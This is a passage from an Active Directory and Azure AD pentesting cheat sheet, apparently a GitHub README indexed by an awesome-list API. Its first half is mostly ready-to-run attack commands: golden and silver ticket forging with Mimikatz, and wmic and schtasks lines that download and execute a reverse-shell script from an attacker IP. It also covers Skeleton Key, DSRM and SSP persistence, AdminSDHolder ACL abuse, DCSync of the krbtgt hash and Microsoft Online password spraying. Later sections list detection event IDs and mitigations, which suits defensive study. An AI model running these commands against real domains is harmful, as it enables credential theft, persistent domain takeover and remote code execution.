/doimain:\u003cdomain\u003e /sid:\u003cdomain_sid\u003e /krbtgt:\u003cnthash\u003e /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt\"'\n```  \nor  \n```\nload kiwi\ngolden_ticket_create -k krbtgt_nthash -d \u003cdomain\u003e -i \u003cid\u003e -s \u003cdomain_sid\u003e -u Administrator -t /tmp/golden.tck\nkerberos_ticket_use /tmp/gold.tck\nkerberos_ticket_list \nwmic /node:dc computersystem get name,username,domain\n```\n\n```\nwmic /node:dc process call create \"powershell -nop -exec bypass iex(new-object net.webclient).downloadstring('http://\u003cip\u003e/rev.ps1')\"\n```\n\n### Silver Ticket \nIt is a persistence and elevation of privilege technique in which a TGS is forged to gain access to a service in an application.  \n-\u003e Get Domain SID  \n```\nGetDomainsid (PowerView)\n```\n\n-\u003e Get Machine Account Hash - RID 1000  \n```\nInvoke-Mimikatz '\"lsadump::lsa /patch\"' -ComputerName \u003chostname_dc\u003e\n```\n\n-\u003e Exploitation  - Creating a Silver Ticket that gives us access to the DC HOST service.\n```\nInvoke-Mimikatz -Command '\"kerberos::golden /domain:\u003cdomain\u003e /sid:\u003cdomainsid\u003e /target:\u003cdc\u003e.\u003cdomain\u003e /service:HOST /rc4:\u003cmachine_account_hash\u003e /user:Administrator /ptt\"'\n```\n\n-\u003e Creating and executing task  \n```\nschtasks /create /S \u003cdc\u003e.\u003cdomain\u003e /SC Weekly /RU \"NT Authority\\SYSTEM\" /TN \"UserX\" /TR \"powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://ip/Invoke-PowerShellTcp.ps1''')'\"\n```\n```\nschtasks /Run /S \u003cdc\u003e.\u003cdomain\u003e /TN \"UserX\"\n```\n```\npowercat -l -p 443 -v -t 1024\n```\n\n-\u003e Creating a Silver Ticket that gives us access to the DC HOST service.  \n```\nInvoke-Mimikatz -Command '\"kerberos::golden /domain:\u003cdomain\u003e /sid:\u003cdomain_sid\u003e /target:\u003cdc\u003e.\u003cdomain\u003e /service:HOST /rc4:\u003cmachine_account_hash\u003e /user:Administrator /ptt\"'\n```\n\n-\u003e Creating a Silver Ticket that gives us access to the DC RPCSS service.  \n```\nInvoke-Mimikatz -Command '\"kerberos::golden /domain:\u003cdomain\u003e/sid:\u003cdomain_sid\u003e /target:\u003cdc\u003e.\u003cdomain\u003e /service:RPCSS /rc4:\u003cmachine_account_hash\u003e /user:Administrator /ptt\"'\n```\n\n### Skeleton Key\nThis malware infiltrates the LSASS (Local Security Authority Subsystem Service) process and creates a master password that can be used to authenticate to any Active Directory account within the compromised domain. The dangerous aspect of this attack is that users' existing passwords continue to function normally, meaning that the authentication process is not interrupted. This makes Skeleton Key attacks difficult to detect unless you know exactly what to look for.\n```\nInvoke-Mimikatz -Command '\"privilege::debug\" \"misc::skeleton\"'\nEnter-PSSession -ComputerName \u003chostname\u003e -Credential \u003cdomain\u003e\\\u003cuser\u003e\n```\n\n* When mimikatz is used to carry out this attack, the default master password defined is \"mimikatz\".\n\n### DSRM Persistence - Change the account login behavior by modifying the registry on the DC\nEach domain controller has a local administrator account for the DC called a Directory Services Restore Mode (DSRM) account.  \nBy default the DSRM administrator is not allowed to log on to the network DC. We will change the account login behavior by modifying the registry on the DC.  \n```\nInvoke-Mimikatz -Command '\"token::elevate\" \"lsadump::sam\"'\n```\n```\nNew-ItemProperty \"HKLM:\\System\\CurrentControlSet\\Control\\Lsa\\\" -Name \"DsrmAdminLogonBehavior\" -Value 2 -PropertyType DWORD\n```\n```\nInvoke-Mimikatz -Command '\"sekurlsa::pth /domain:\u003cdomain\u003e /user:Administrator /ntlm:\u003cadmin_nthash\u003e /run:powershell.exe\"'\n```\n\n### Custom SSP - Persistence\n```\n$packages = Get-ItemProperty HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\OSConfig\\ -Name 'Security Packages' | select -ExpandProperty 'Security Packages'\n$packages += \"mimilib\"\nSet-ItemProperty HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\OSConfig\\ -Name 'Security Packages' -Value $packages\nSet-ItemProperty HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\ -Name 'Security Packages' -Value $packages\nInvoke-Mimikatz -Command '\"misc::memssp\"'\ntype C:\\Windows\\system32\\kiwissp.log\n```\n\n### Persistence using ACLs - AdminSDHolder\n-\u003e Add FullControl permissions for a user to the AdminSDHolderusing PowerViewas DA  \n```\nImport-Module Microsoft.ActiveDirectory.Management.dll\nImport-Module ActiveDirectory.psd1\n. .\\SetADACL.ps1\nAdd-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder, CN=System' -PrincipalSamAccountName \u003cuser\u003e -Rights All -Verbose\nSet-ADACL -DistinguishedName 'CN=AdminSDHolder, CN=System, DC=\u003cdomain_child\u003e, DC=\u003cdomain_root\u003e, DC=local' -Principal \u003cuser\u003e - Verbose\n```\n\n-\u003e Invoke-SDPropagator  \n```\n$sess = New-PSSession -ComputerName \u003chostname_dc\u003e.\u003cdomain\u003e\nInvoke-Command -FilePath .\\Invoke-SDPropagator.ps1 -Session $sess\nInvoke-SDPropagator -timeoutMinutes 1 -showProgress -Verbose\n```\n\n-\u003e Abusing FullControl using PowerView_dev  \n```\nGet-ADUser -Identity \u003cuser\u003e\nAdd-ADGroupMember -Identity 'Domain Admins' -Members \u003cuser\u003e -Verbose\nGet-ADGroupMember -Identity 'Domain Admins'\n```\n\n-\u003e Others - WriteMembers Permission for a user to the AdminSDHolder  \n```\nAdd-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder, CN=System' -PrincipalSamAccountName \u003cuser\u003e -Rights ResetPassword -Verbose\n```\n\n-\u003e Others - ResetPassword Permission and abusing for a user to the AdminSDHolder  \n```\nAdd-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder, CN=System' -PrincipalSamAccountName \u003cuser\u003e -Rights WriteMembers -Verbose\nSet-DomainUserPassword -Identity \u003cuser\u003e -AccountPassword(ConvertTo-SecureString \"Password@123\" -AsPlainText -Force) -Verbose\nSet-ADAccountPassword-Identity \u003cuser\u003e -NewPassword(ConvertTo-SecureString \"Password@123\" -AsPlainText-Force) -Verbose\n```\n\n-\u003e Security Descriptors\n```\nSet-RemotePSRemoting -UserName \u003cuser\u003e -Verbose\nSet-RemotePSRemoting -UserName \u003cuser\u003e -ComputerName \u003chostname\u003e -Verbose\nSet-RemotePSRemoting -UserName \u003cuser\u003e -ComputerName \u003chostname\u003e -Verbose -Remove\n```\n\n### DCSync Attack\nDCSync is an attack that consists of simulating the behavior of a domain controller, recovering password data through domain replication, being widely used to recover the KRBTGT hash and later escalating to a golden ticket attack.\n-\u003e Check if user Replication (DCSync) rights\n```\nGet-ObjectAcl -DistinguishedName \"dc=example, dc=ok,dc=local\" -ResolveGUIDs | ?{($_.IdentityReference -match \"\u003cuser\u003e\") -and (($_.ObjectType -match 'replication') -or ($_.ActiveDirectoryRights -match 'GenericAll'))}\n```\n\n-\u003e Adding Replication Rights (DCSync) to a User using ACLs (requires high privilege) (PowerView)  \n```\nAdd-ObjectAcl -TargetDistinguishedName \"dc=example, dc=ok, dc=local\" -PrincipalSamAccountName \u003cuser\u003e -Rights DCSync -Verbose\n```\n```\nInvoke-Mimikatz -Command '\"lsadump::dcsync /user:\u003cdomain\u003e\\krbtgt\"'\n```\nor  \n-\u003e Using ActiveDirectory Module and Set-ADACL  \n```\nImport-Module Microsoft.ActiveDirectory.Management.dll\nImport-Module ActiveDirectory.psd1\n. .\\Set-ADACL.ps1\nSet-ADACL -DistinguishedName 'DC=example, DC=ok.corp, DC=local'-Principal \u003cuser\u003e -GUID RightDCSync -Verbose\n```\n```\nGet-ObjectAcl -DistinguishedName \"dc=example,dc=ok.corp,dc=local\" -ResolveGUIDs | ?{($_.IdentityReference -match \"studentx\") -and (($_.ObjectType -match'replication') -or ($_.ActiveDirectoryRights -match 'GenericAll'))}\n```\n```\nInvoke-Mimikatz -Command '\"lsadump::dcsync /user:\u003cdomain\u003e\\krbtgt\"'\n```\n\n## Attacks Detection via Events\n### Golden Ticket - Detection\nEvent ID:  \n- 4624: Account Logon  \n- 4672: Admin Logon  \n```\nGet-WinEvent -FilterHashtable @{Logname='Security';ID=4672} -MaxEvents 1 | Format-List -Property *\n```\n\n### Silver Ticket - Detection\nEvent ID: \n- 4624: Account Logon  \n- 4634: Account Logoff  \n- 4672: Admin Logon  \n```\nGet-WinEvent -FilterHashtable @{Logname='Security';ID=4672} -MaxEvents 1 | Format-List -Property *\n```\n\n### Skeleton Key - Detection\nEvent ID:  \n- System Event ID 7045: A new service was installed in the system. (Type Kernel Mode driver)  \n\"Audit Privilege Usage\" must be enabled for the events below:  \n- Security Event ID 4673 - A privileged service was called  \n- Event ID 4611 - A trusted logon process has been registered with the Local Security Authority  \n\n```\nGet-WinEvent -FilterHashtable @{Logname='System';ID=7045} | ?{$_.message -like \"*Kernel Mode Driver*\"}\n```\n```\nGet-WinEvent -FilterHashtable @{Logname='System';ID=7045} | ?{$_.message -like \"*Kernel Mode Driver*\" -and $_.message -like \"*mimidrv*\"}\n```  \n\n### DSRM - Detection\n- Event ID 4657 - Audit creation/change of  \nHKLM:\\System\\CurrentControlSet\\Control\\Lsa\\DsrmAdminLogonBehavior\n\n### Malicious SSP - Detection\n- Event ID 4657 - Audit creation/change of:  \nHKLM:\\System\\CurrentControlSet\\Control\\Lsa\\SecurityPackages  \n\n### Kerberoast - Detection\nEvent ID:  \n- Security Event ID 4769: A kerberos ticket was requested   \n-\u003e Search filter, removing the following items from the query:  \n- krbtgt service;   \n- Service name ending with $;  \n- Account name as follows: machine@domain.   \n\nfault code is '0x0'  \nTicket encryption type is 0x17  \n```\nGet-WinEvent -FilterHashtable @{Logname='Security';ID=4769} -MaxEvents 1000 | ?{$_.Message.split(\"`n\")[8] -ne 'krbtgt' -and $_.Message.split(\"`n\")[8] -ne '*$' -and $_.Message.split(\"`n\")[3] -notlike '*$@*' -and $_.Message.split(\"`n\")[18] -like '*0x0*' -and $_.Message.split(\"`n\")[17] -like \"*0x17*\"} | select -ExpandProperty message\nGet-WinEvent -FilterHashtable @{Logname='Security';ID=4769} -MaxEvents 1000 | ?{$_.Message.split(\"`n\")[8] -ne 'krbtgt' -and $_.Message.split(\"`n\")[8] -ne '*$' -and $_.Message.split(\"`n\")[3] -notlike '*$@*' -and $_.Message.split(\"`n\")[18] -like '*0x0*' -and $_.Message.split(\"`n\")[17] -like \"*0x17*\"} | select-ExpandPropertymessage\n```\n\n### ACL Attacks - Detection \nThe \"audit policy\" for the object must be enabled for the events below:  \n- Security Event ID 4662 - An operation was performed on an object;  \n- Security Event ID 5136 - A directory service object was modified;  \n- Security Event ID 4670 - Permissions on an object were changed.\n\n-\u003e Tool  \nAD ACL Scanner - Create ACL's reports and compare.  \nhttps://github.com/canix1/ADACLScanner  \n\n## Mitigation and Defense Mechanisms\n### Best Practices for Securing Active Directory\nhttps://learn.microsoft.com/en-us/windows-server/identity/ad-ds/plan/security-best-practices/best-practices-for-securing-active-directory\n\n### Securing privileged access\nhttps://learn.microsoft.com/en-us/security/privileged-access-workstations/overview\n\n### Pass-The-Hash - Mitigation\nhttps://download.microsoft.com/download/7/7/a/77abc5bd-8320-41af-863c-6ecfb10cb4b9/mitigating%20pass-the-hash%20(pth)%20attacks%20and%20other%20credential%20theft%20techniques_english.pdf\n\n### Kerberoast - Mitigation\n- Service Account Passwords with more than 25 characters;  \n- Use managed service accounts by setting automatic password change periodically and delegated SPN management  \n\nhttps://technet.microsoft.com/en-us/library/jj128431(v=ws.11).aspx  \n\n### Skeleton Key - Mitigation\n- Run lsass.exe as a protected process, forcing an attacker to load a kernel-mode driver\n```\nNew-ItemProperty HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\ -Name RunAsPPL -Value 1 -Verbose\n```\n-\u003e Checking after a reboot\n```\nGet-WinEvent -FilterHashtable @{Logname='System';ID=12} | ?{$_.message -like \"*protected process*\"}\n```\n\n### Delegation - Mitigation\n-\u003e Restrict logins of high privilege users like Domain Admin and other admins to specific servers. \n-\u003e \"There are a number of configuration options we recommend for securing high privileged accounts. One of them, enabling 'Account is sensitive and cannot be delegated' , ensures that an account’s credentials cannot be forwarded to other computers or services on the network by a trusted application.\"\nReference:  \nhttps://docs.microsoft.com/en-us/archive/blogs/poshchap/security-focus-analysing-account-is-sensitive-and-cannot-be-delegated-for-privileged-accounts\n\n### PowerShell - Recommendation\n-\u003e Upgrade to windows powershell 5.1  \nIn Windows PowerShell 5.1 there are several security controls that increase the complexity for attackers to succeed in their exploits.\n\n### Whitelisting - Recommendation\nUse AppLocker and Device Guard application control policies to restrict PowerShell scripts. With Applocker set to “allow mode” for scripts, PowerShell5 will automatically use restricted language mode.  \nhttps://learn.microsoft.com/pt-br/windows/security/threat-protection/windows-defender-application-control/applocker/applocker-overview  \nhttps://devblogs.microsoft.com/powershell/powershell-constrained-language-mode/  \n\n### NetCease - Recommendation\nIf feasible, use NetCease, as it changes the permissions in the NetSessionEnum method, removing the permission for the Authenticated Users group, this causes several resources used by intruders during the enumeration to fail, making greater compromises in the Active Directory environment difficult.  \nhttps://github.com/p0w3rsh3ll/NetCease  \n\n### JEA - Just Enough Administration\n\"Reduce the number of administrators on your machines using virtual accounts or group-managed service accounts to perform privileged actions on behalf of regular users.\"  \n\"Better understand what your users are doing with transcripts and logs that show you exactly which commands a user executed during their session.\"  \nReference:  \nhttps://learn.microsoft.com/pt-br/powershell/scripting/learn/remoting/jea/overview?view=powershell-7.3\n\nLimit what users can do by specifying which cmdlets, functions, and external commands they can run on their machines, also better manage transcripts and logs that show what commands a user performed during the session.  \n### Constrained PowerShell\nhttps://devblogs.microsoft.com/powershell/powershell-constrained-language-mode/\n\n### LAPS (Local Administrator Password Solution)\nhttps://www.microsoft.com/en-us/download/details.aspx?id=46899\n\n### Credential Guard\nCredential Guard uses virtualization to store credentials in containers isolated from the operating system more securely than conventionally.  \n- Effective in stopping Pass-TheHash and Over-Pass-The-Hash attacks as it restricts access to NTLM hashes and TGTs.  \n\n-\u003e Atention  \n- On Windows 10 1709 it is not possible to write Kerberos tickets to memory.  \n- But, credentials for local accounts in SAM and Service account credentials from LSA Secrets are not protected;  \n- Cannot be enabled on a domain controller as it breaks authentication;  \n\nhttps://docs.microsoft.com/en-us/windows/access-protection/credential-guard/credential-guard\n\n### Device Guard\nNow called Windows Defender Device Guard, it is a combination of software and hardware security features designed to protect a system from malware attacks where it will block untrusted applications from running.  \n-\u003e Components:  \n- CCI(Configurable Code Integrity) - Ensures that only trusted code is executed \n- VSM (Virtual Secure Mode) Protected Code Integrity - Moves KMCI (Kernel Mode Code Integrity) and HVCI(Hypervisor Code Integrity (HVCI) components to VSM, protecting against attacks.  \n- Platform and UEFI Secure Boot - Ensures signature of boot binaries and UEFI Firmware, ensuring integrity.   \n\n-\u003e Info  \n- UMCI(User Mode Code Integrity) helps by interfering with most movement attacks.   \nhttps://docs.microsoft.com/en-us/windows/device-security/device-guard/introduction-to-device-guard-virtualization-based-security-and-code-integrity-policies\n\n### Protected Users Group\n- It's a group introduced in Server 2012 R2 for \"better protection against credential theft\", does not cache credentials, a user added to this group:  \n- Cannot use CredSSP and WDigest as there is no more caching of clear text credentials;   \n- The NTLM Hash is not cached when a user is in a protected group.\n\nNotes: With a user in this group, given that there is no cached logon, there he is no way to logon offline. Microsoft does not recommend adding Domain Administrators and Enterprise Administrators to this group without testing the true impact of the block.  \nhttps://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/protected-users-security-group\n\n#### Active Directory Administrative Tier Model\nTier 0 - Domain Controller: e.g. domain controllers, domain admins, enterprise admins;  \nTier 1 - Servers: e.g. Administrators of servers;  \nTier 2 - Workstations - e.g. help desk and computer support administrators.  \n\nApply Control Restrictions - What admins control:\n\u003ca href=\"https://petri-media.s3.amazonaws.com/2017/09/Figure1-1.jpg\"\u003e\n  \u003cimg height=350 src=\"https://petri-media.s3.amazonaws.com/2017/09/Figure1-1.jpg\" /\u003e\n\u003c/a\u003e\n\nLogon Restrictions - Where admins can log-on to:  \n\u003ca href=\"https://petri-media.s3.amazonaws.com/2017/09/Figure1-1.jpg\"\u003e\n  \u003cimg height=342 src=\"https://petri-media.s3.amazonaws.com/2017/09/Figure2.jpg\" /\u003e\n\u003c/a\u003e\n\nreferences:  \nhttps://petri.com/use-microsofts-active-directory-tier-administrative-model/\nhttps://learn.microsoft.com/en-us/security/compass/privileged-access-access-model\n\n### Deception Techniques\nDeception is a technique that consists of using decoy domain objects, tricking opponents to follow a specific attack path, which increases the chances of detection.  \nThe adversary must be provided with what he is looking for, so that we can detect him.  \nA good tool for this is Deploy-Deception:  \nhttps://github.com/samratashok/Deploy-Deception  \n-\u003e Find Fake Computer Objects Honey Pots, Fake Service Accounts Honey Tokens, Inactive Domain Adminis Honey Tokens.  \n```\nInvoke-HoneypotBuster -OpSec\n```\nhttps://raw.githubusercontent.com/JavelinNetworks/HoneypotBuster/master/Invoke-HoneypotBuster.ps1 \n\n## Pentest Azure AD\n### Enumeration\n-\u003e Install module\n```\nInstall-Module AzureAD\n```\n\n-\u003e authenticate to Azure AD\n```\nConnect-AzureAD\n```\n\n-\u003e list all domain users\n```\nGet-AzureADUser -All $true\n```\n\n-\u003e List all domain groups\n```\nGet-AzureADGroup -All $true\n```\n\n-\u003e List members of a domain-specific group\n```\nGet-AzureADGroupMember -ObjectId \u003cID\u003e\n```\n\n-\u003e Enumerate all devices in the domain\n```\nGet-AzureADDevice -All $true\n```\n\n### Password Spraying in Microsoft Online accounts\n\nhttps://github.com/dafthack/MSOLSpray\n\n-\u003e Import Module\n```\nImport-Module MSOLSpray.ps1\n```\n\n-\u003e attack\n```\nInvoke-MSOLSpray -UserList .\\users.txt -Password Empresa@2024\n```\n\n### Automated Azure AD Enumeration and Dumping\n\n```\nazurehound list -u \"\u003cuser\u003e\" -p \"\u003cpassword\u003e\" -t \"\u003ctenant\u003e\"\n```\nhttps://github.com/BloodHoundAD/AzureHound\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Frodolfomarianocy%2Ftricks-pentest-active-directory","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Frodolfomarianocy%2Ftricks-pentest-active-directory","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Frodolfomarianocy%2Ftricks-pentest-active-directory/lists"}